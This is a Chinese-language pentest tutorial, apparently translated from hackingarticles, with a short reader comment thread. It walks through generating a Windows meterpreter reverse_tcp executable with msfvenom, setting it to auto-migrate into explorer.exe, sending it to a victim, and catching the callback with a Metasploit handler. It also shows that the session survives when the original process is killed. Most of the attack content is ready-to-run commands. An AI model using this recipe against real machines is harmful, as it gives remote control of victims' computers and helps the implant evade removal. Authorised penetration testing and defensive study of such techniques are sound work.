使用Msfvenom隐藏和转移shell

如果您是渗透测试人员,那么这可能有助于对目标系统的攻击创建强大的payload。在本文中,您将了解更多关于msfvenom的功能,这里我们将创建一个有别于我上一个教程的payload。如果当前进程被杀死,有效载荷会迁移其进程,因此如果受害者从其系统中杀死payload所在的进程ID,攻击者也不会丢失其会话。

开始

在kali Linux中打开终端,并输入以下命令来生成exe格式的payload。

Msfvenom –p windows/meterpreter/reverse_tcp 

lhost=192.168.1.104

lport=5555

prependmigrate=true

prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

以上命令会在桌面上创建raj.exe文件,现在将这个文件发送到远程系统进行攻击。

msf1

加载metasploit框架并键入以下命令来启动攻击。

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

当受害者打开raj.exe文件,我们将获得meterpreter会话。

meterpreter> sysinfo

msf2

现在让我们检查一下我们的payload的进程ID。

meterpreter> ps

从突出显示的文本中,您可以看到显示的进程ID:raj.exe(4960)

msf3

现在攻击者尝试自己kill掉raj.exe的进程验证进程迁移,结果进程4960被杀死。

meterpreter> kill 4960

但是我们仍然有受害者的会话,这意味着raj.exe文件迁移到新的进程ID。

meterpreter> sysinfo

msf4

 

*来源:hackingarticles,MottoIN小编编译发布,转载请注明来自MottoIN

原创文章,作者:Jarry,如若转载,请注明出处:http://www.mottoin.com/99072.html

发表评论

登录后才能评论

评论列表(3条)

  • 9f01
    9f01 2017年3月24日 上午12:31

    具体原因是什么,因为当前的进程内存还没有被占用吗?

    • Jarry
      Jarry 2017年3月24日 上午9:55

      关键部分是
      prependmigrate=true
      prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
      这是Meterpreter的自动注入进程命令(将raj.exe注入到explorer.exe,文章图中有标出,杀死的4960进程是raj.exe的),相关资料可以在Meterpreter帮助手册中找到,

      • 9f01
        9f01 2017年3月31日 上午9:29

        回头再看的时候看到了,当时没注意到 –!感谢回复 :)

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code